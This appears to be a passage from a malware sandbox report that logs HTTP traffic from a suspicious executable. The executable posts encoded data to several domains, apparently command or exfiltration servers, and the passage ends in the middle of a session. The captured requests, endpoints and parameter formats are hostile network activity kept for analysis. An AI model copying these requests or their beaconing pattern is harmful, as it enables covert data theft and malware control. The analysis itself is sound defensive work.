                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              8192.168.2.849722198.252.106.191806192C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 25, 2024 09:16:37.395792961 CEST475OUTGET /tuad/?Ux_TPFo=COR99YL4ij4WSzIn9uKNQTj+/nF71npMJ8PUbDDmK/MOrLSwhgHAUUFmM9ZFV75zOrifp59AeN3Qrz+fk81rYB1Esp+MUB3RCvU15TDIEUASO5KKoulUwcQsQXQ4LVDRNA==&FvypB=88kTDXb8k4dH HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-us
                                                              Host: www.suarahati20.xyz
                                                              Connection: close
                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                              Sep 25, 2024 09:16:37.932672977 CEST1033INHTTP/1.1 404 Not Found
                                                              Connection: close
                                                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                              pragma: no-cache
                                                              content-type: text/html
                                                              content-length: 796
                                                              date: Wed, 25 Sep 2024 07:16:37 GMT
                                                              server: LiteSpeed
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              9192.168.2.8497243.33.130.190806192C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 25, 2024 09:16:42.987644911 CEST719OUTPOST /u85y/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-us
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.dhkatp.vip
                                                              Origin: http://www.dhkatp.vip
                                                              Referer: http://www.dhkatp.vip/u85y/
                                                              Content-Length: 208
                                                              Connection: close
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Cache-Control: no-cache
                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                              Data Raw: 55 78 5f 54 50 46 6f 3d 39 44 66 35 66 54 64 67 38 38 4b 49 46 56 36 4f 39 65 58 55 61 77 4b 49 45 77 4c 58 38 4e 56 41 70 30 64 44 4f 62 46 57 49 50 47 61 64 38 65 43 57 54 66 39 68 71 47 51 74 4c 42 52 6b 68 57 54 36 54 6e 64 41 74 41 2b 37 73 56 34 37 35 6f 77 2b 44 4c 32 55 39 50 63 68 39 2f 78 43 5a 67 43 2b 79 57 57 7a 75 49 66 75 52 42 68 4d 59 35 46 55 4f 68 33 79 7a 4c 39 6d 58 70 76 6b 6f 4a 55 31 39 46 63 36 58 75 55 6e 52 76 30 42 7a 73 57 66 38 56 35 78 77 55 67 53 4f 65 46 63 64 76 42 64 72 79 78 2f 69 2f 42 75 63 4f 70 65 31 35 56 67 6c 46 69 70 50 44 74 4c 59 37 77 58 6d 4d 30 77 70 59 68 2b 54 6b 3d
                                                              Data Ascii: Ux_TPFo=9Df5fTdg88KIFV6O9eXUawKIEwLX8NVAp0dDObFWIPGad8eCWTf9hqGQtLBRkhWT6TndAtA+7sV475ow+DL2U9Pch9/xCZgC+yWWzuIfuRBhMY5FUOh3yzL9mXpvkoJU19Fc6XuUnRv0BzsWf8V5xwUgSOeFcdvBdryx/i/BucOpe15VglFipPDtLY7wXmM0wpYh+Tk=


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              10192.168.2.8497253.33.130.190806192C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 25, 2024 09:16:45.539611101 CEST739OUTPOST /u85y/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-us
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.dhkatp.vip
                                                              Origin: http://www.dhkatp.vip
                                                              Referer: http://www.dhkatp.vip/u85y/
                                                              Content-Length: 228
                                                              Connection: close
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Cache-Control: no-cache
                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                              Data Raw: 55 78 5f 54 50 46 6f 3d 39 44 66 35 66 54 64 67 38 38 4b 49 48 31 71 4f 75 39 50 55 59 51 4b 4a 61 67 4c 58 31 74 56 45 70 30 42 44 4f 61 42 47 49 39 69 61 45 64 75 43 58 53 66 39 6d 71 47 51 31 62 42 55 36 52 57 59 36 53 61 75 41 74 4d 2b 37 73 42 34 37 39 67 77 2b 79 4c 31 56 74 50 65 30 74 2f 2f 50 35 67 43 2b 79 57 57 7a 71 6f 6c 75 52 5a 68 4d 72 68 46 54 66 68 30 78 7a 4c 2b 68 58 70 76 67 6f 4a 51 31 39 45 7a 36 53 4f 79 6e 53 48 30 42 79 63 57 66 70 68 34 36 77 55 6d 66 75 66 6d 5a 59 44 52 56 4b 69 5a 32 30 36 6e 67 38 43 63 62 44 55 2f 36 48 4e 6b 71 50 72 47 4c 62 54 47 53 52 52 63 71 4b 49 52 67 45 7a 77 39 36 2f 4f 46 30 6f 64 6e 46 69 44 70 45 59 75 58 55 4e 73
                                                              Data Ascii: Ux_TPFo=9Df5fTdg88KIH1qOu9PUYQKJagLX1tVEp0BDOaBGI9iaEduCXSf9mqGQ1bBU6RWY6SauAtM+7sB479gw+yL1VtPe0t//P5gC+yWWzqoluRZhMrhFTfh0xzL+hXpvgoJQ19Ez6SOynSH0BycWfph46wUmfufmZYDRVKiZ206ng8CcbDU/6HNkqPrGLbTGSRRcqKIRgEzw96/OF0odnFiDpEYuXUNs


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              11192.168.2.8497263.33.130.190806192C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 25, 2024 09:16:48.087086916 CEST1756OUTPOST /u85y/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-us
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.dhkatp.vip
                                                              Origin: http://www.dhkatp.vip
                                                              Referer: http://www.dhkatp.vip/u85y/
                                                              Content-Length: 1244
                                                              Connection: close
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Cache-Control: no-cache
                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                              Data Raw: 55 78 5f 54 50 46 6f 3d 39 44 66 35 66 54 64 67 38 38 4b 49 48 31 71 4f 75 39 50 55 59 51 4b 4a 61 67 4c 58 31 74 56 45 70 30 42 44 4f 61 42 47 49 39 71 61 45 50 57 43 57 78 33 39 6e 71 47 51 39 37 42 56 36 52 57 4a 36 54 79 78 41 73 78 4c 37 75 35 34 36 66 34 77 70 33 72 31 4d 64 50 65 32 74 2f 79 43 5a 68 49 2b 7a 37 66 7a 75 45 6c 75 52 5a 68 4d 74 4e 46 46 65 68 30 33 7a 4c 39 6d 58 70 72 6b 6f 4a 6f 31 37 74 45 36 53 36 45 6e 6a 6e 30 42 52 6b 57 5a 62 35 34 34 51 55 6b 4d 65 66 41 5a 59 47 57 56 4b 2b 6b 32 30 6e 43 67 2b 53 63 5a 46 56 38 75 30 6c 62 79 73 66 75 50 37 48 6a 53 54 73 38 71 61 45 46 67 45 2f 52 78 62 50 77 53 31 59 53 74 58 33 62 7a 43 49 46 64 30 59 5a 6b 37 34 38 5a 73 37 32 30 41 63 77 4f 64 54 37 76 38 75 4d 39 76 37 7a 70 68 4d 65 65 67 45 4b 36 42 37 6a 71 62 71 78 76 73 75 48 45 75 70 54 68 6c 48 43 41 53 61 4e 72 31 34 52 4d 39 73 6a 73 70 52 39 6c 6a 2b 58 75 4b 6d 66 69 33 62 49 70 59 31 2b 68 6b 4c 49 44 36 6f 61 51 4d 58 5a 30 78 77 53 69 61 47 58 59 67 68 55 63 59 [TRUNCATED]
                                                              Data Ascii: Ux_TPFo=9Df5fTdg88KIH1qOu9PUYQKJagLX1tVEp0BDOaBGI9qaEPWCWx39nqGQ97BV6RWJ6TyxAsxL7u546f4wp3r1MdPe2t/yCZhI+z7fzuEluRZhMtNFFeh03zL9mXprkoJo17tE6S6Enjn0BRkWZb544QUkMefAZYGWVK+k20nCg+ScZFV8u0lbysfuP7HjSTs8qaEFgE/RxbPwS1YStX3bzCIFd0YZk748Zs720AcwOdT7v8uM9v7zphMeegEK6B7jqbqxvsuHEupThlHCASaNr14RM9sjspR9lj+XuKmfi3bIpY1+hkLID6oaQMXZ0xwSiaGXYghUcYPzn0sjoa5acApJiQRrHeYrPWgpDkF24m67t8P8pOe3VNyraK/JEiGtyv7T5O2iTVPph3HYWihNL+Oc1eUYP7FZkI8o4wOcSeScpLbE4JmHAv86fygJ3Mb1x+mjQvWhHMUmnP4+y/fNrE9nqg1l/9g7MGDnLSIXv/YAL3FjW9fQ19oebh2PlpVKIRe+If6CZI2r009EoeFJoOFuUGz2i1NUt05RdShUx6ZlmnrUKGNlcIXYSkBjbwJL3MRhr0JUJ6fq2CDnetCDW5MRhNQE+SR7aQ/9IkGNVTpa/w6BT7yDX35kmrCBxvg4UsniAWT/oaoE1muWmhwOgCbX2uW6VRuRcgEU0qRV9rV7pR5cwzdyltfR1Fke1uZfwacwXQKb73x09vhTGe8P/w97tGQB05qnPkRQiM8xo02afB9dUCvXP8Xu2iEgxH150/8OhuKpLpnu+eGTNNaOJFxHPHkqQLy3K8gXOsEANdw2Pzi4X/R2TF7LAJs6VlBO+7qGWs9k/yMKG+atRXK2cBNdrsLPjfDOb4fLrN4ni2LiWJdTo8H8W51wS//8/w+KCxpFhh59sfqZCgzysk9WpdAcHiTHrXhGGTcZ9OkVjxwtcKnKO28yYVURzqGpnsqmiJFPjg3Em7M4aMpahuGeCt/QzJlD63YJ84l5J8LTcNxG [TRUNCATED]


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              12192.168.2.8497273.33.130.190806192C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 25, 2024 09:16:50.629978895 CEST470OUTGET /u85y/?FvypB=88kTDXb8k4dH&Ux_TPFo=wB3ZcmNh1MmrIwfSzb/pYDfeTUzW6O1UjWNgVadWZuGYS/WrcxHhgLOrzo8qigeYzDjwJvcv1eEC2ecO3wCLRJj3wqTQMKM05jGtzaYfnBJ5M7wMOeAqnxHMoiYb58YbsA== HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-us
                                                              Host: www.dhkatp.vip
                                                              Connection: close
                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                              Sep 25, 2024 09:16:51.106215954 CEST414INHTTP/1.1 200 OK
                                                              Server: openresty
                                                              Date: Wed, 25 Sep 2024 07:16:51 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 274
                                                              Connection: close
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 46 76 79 70 42 3d 38 38 6b 54 44 58 62 38 6b 34 64 48 26 55 78 5f 54 50 46 6f 3d 77 42 33 5a 63 6d 4e 68 31 4d 6d 72 49 77 66 53 7a 62 2f 70 59 44 66 65 54 55 7a 57 36 4f 31 55 6a 57 4e 67 56 61 64 57 5a 75 47 59 53 2f 57 72 63 78 48 68 67 4c 4f 72 7a 6f 38 71 69 67 65 59 7a 44 6a 77 4a 76 63 76 31 65 45 43 32 65 63 4f 33 77 43 4c 52 4a 6a 33 77 71 54 51 4d 4b 4d 30 35 6a 47 74 7a 61 59 66 6e 42 4a 35 4d 37 77 4d 4f 65 41 71 6e 78 48 4d 6f 69 59 62 35 38 59 62 73 41 3d 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?FvypB=88kTDXb8k4dH&Ux_TPFo=wB3ZcmNh1MmrIwfSzb/pYDfeTUzW6O1UjWNgVadWZuGYS/WrcxHhgLOrzo8qigeYzDjwJvcv1eEC2ecO3wCLRJj3wqTQMKM05jGtzaYfnBJ5M7wMOeAqnxHMoiYb58YbsA=="}</script></head></html>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              13192.168.2.849728148.251.114.233806192C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 25, 2024 09:16:56.236960888 CEST749OUTPOST /30vc/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-us
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.eslameldaramlly.site
                                                              Origin: http://www.eslameldaramlly.site
                                                              Referer: http://www.eslameldaramlly.site/30vc/
                                                              Content-Length: 208
                                                              Connection: close
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Cache-Control: no-cache
                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                              Data Raw: 55 78 5f 54 50 46 6f 3d 70 71 6a 4e 46 35 50 42 77 4d 43 55 70 35 65 74 43 59 6f 35 7a 70 52 76 66 72 39 52 6c 61 63 55 56 79 79 43 42 5a 5a 52 43 58 72 74 52 61 42 32 37 74 64 6b 6d 4a 32 2b 42 4a 50 41 36 42 6f 59 57 2b 70 54 57 4f 78 6e 65 56 77 30 4a 52 39 4b 55 39 4b 7a 50 50 66 36 58 54 68 2b 2b 31 34 4c 77 33 6e 64 5a 70 4a 4d 35 36 64 68 5a 6e 52 46 55 2b 52 4c 39 5a 4d 76 6d 5a 68 53 45 47 54 50 69 5a 75 59 5a 79 74 45 31 52 53 57 42 6a 30 33 54 39 45 6d 42 58 41 72 39 48 39 59 30 6a 46 45 42 59 6d 32 42 36 70 66 77 71 76 56 56 78 61 41 59 44 48 50 6f 2b 45 4d 38 79 76 38 52 56 52 62 77 72 55 58 6d 66 30 3d
                                                              Data Ascii: Ux_TPFo=pqjNF5PBwMCUp5etCYo5zpRvfr9RlacUVyyCBZZRCXrtRaB27tdkmJ2+BJPA6BoYW+pTWOxneVw0JR9KU9KzPPf6XTh++14Lw3ndZpJM56dhZnRFU+RL9ZMvmZhSEGTPiZuYZytE1RSWBj03T9EmBXAr9H9Y0jFEBYm2B6pfwqvVVxaAYDHPo+EM8yv8RVRbwrUXmf0=
                                                              Sep 25, 2024 09:16:56.878567934 CEST1236INHTTP/1.1 404 Not Found
                                                              Connection: close
                                                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                              pragma: no-cache
                                                              content-type: text/html
                                                              content-length: 1238
                                                              date: Wed, 25 Sep 2024 07:16:56 GMT
                                                              server: LiteSpeed
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 [TRUNCATED]
                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by <a style="color:#fff;"
                                                              Sep 25, 2024 09:16:56.878588915 CEST240INData Raw: 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6c 69 74 65 73 70 65 65 64 74 65 63 68 2e 63 6f 6d 2f 65 72 72 6f 72 2d 70 61 67 65 22 3e 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 2f 61 3e 3c 70 3e 50 6c 65 61 73 65 20 62
                                                              Data Ascii: href="http://www.litespeedtech.com/error-page">LiteSpeed Web Server</a><p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              14192.168.2.849729148.251.114.233806192C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 25, 2024 09:16:58.774002075 CEST769OUTPOST /30vc/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-us
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.eslameldaramlly.site
                                                              Origin: http://www.eslameldaramlly.site
                                                              Referer: http://www.eslameldaramlly.site/30vc/
                                                              Content-Length: 228
                                                              Connection: close
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Cache-Control: no-cache
                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                              Data Raw: 55 78 5f 54 50 46 6f 3d 70 71 6a 4e 46 35 50 42 77 4d 43 55 70 59 75 74 52 70 6f 35 69 5a 52 77 61 72 39 52 72 36 63 51 56 79 75 43 42 59 4d 4a 43 68 62 74 52 37 78 32 36 6f 70 6b 6a 4a 32 2b 4c 70 50 46 31 68 70 55 57 2b 6c 68 57 4f 64 6e 65 56 55 30 4a 51 74 4b 56 4e 32 77 4e 66 66 30 44 6a 68 38 36 31 34 4c 77 33 6e 64 5a 70 4e 6d 35 2b 78 68 59 58 68 46 56 66 52 4d 68 4a 4d 6f 68 5a 68 53 53 32 53 6e 69 5a 75 36 5a 32 4e 75 31 53 36 57 42 69 45 33 55 70 51 6c 4b 58 41 74 7a 6e 38 70 36 32 34 4c 49 66 71 4d 43 63 73 77 2f 36 37 51 51 48 33 71 43 68 50 4a 72 2b 73 6e 38 78 48 4b 55 69 4d 7a 71 49 45 6e 34 49 67 58 53 31 31 6d 50 76 34 32 52 7a 59 6b 4f 58 4b 67 45 51 37 49
                                                              Data Ascii: Ux_TPFo=pqjNF5PBwMCUpYutRpo5iZRwar9Rr6cQVyuCBYMJChbtR7x26opkjJ2+LpPF1hpUW+lhWOdneVU0JQtKVN2wNff0Djh8614Lw3ndZpNm5+xhYXhFVfRMhJMohZhSS2SniZu6Z2Nu1S6WBiE3UpQlKXAtzn8p624LIfqMCcsw/67QQH3qChPJr+sn8xHKUiMzqIEn4IgXS11mPv42RzYkOXKgEQ7I
                                                              Sep 25, 2024 09:16:59.405158997 CEST1236INHTTP/1.1 404 Not Found
                                                              Connection: close
                                                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                              pragma: no-cache
                                                              content-type: text/html
                                                              content-length: 1238
                                                              date: Wed, 25 Sep 2024 07:16:59 GMT
                                                              server: LiteSpeed
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 [TRUNCATED]
                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by <a style="color:#fff;"
                                                              Sep 25, 2024 09:16:59.405184984 CEST240INData Raw: 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6c 69 74 65 73 70 65 65 64 74 65 63 68 2e 63 6f 6d 2f 65 72 72 6f 72 2d 70 61 67 65 22 3e 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 2f 61 3e 3c 70 3e 50 6c 65 61 73 65 20 62
                                                              Data Ascii: href="http://www.litespeedtech.com/error-page">LiteSpeed Web Server</a><p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              15192.168.2.849730148.251.114.233806192C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 25, 2024 09:17:01.332737923 CEST1786OUTPOST /30vc/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-us
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.eslameldaramlly.site
                                                              Origin: http://www.eslameldaramlly.site
                                                              Referer: http://www.eslameldaramlly.site/30vc/
                                                              Content-Length: 1244
                                                              Connection: close
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Cache-Control: no-cache
                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
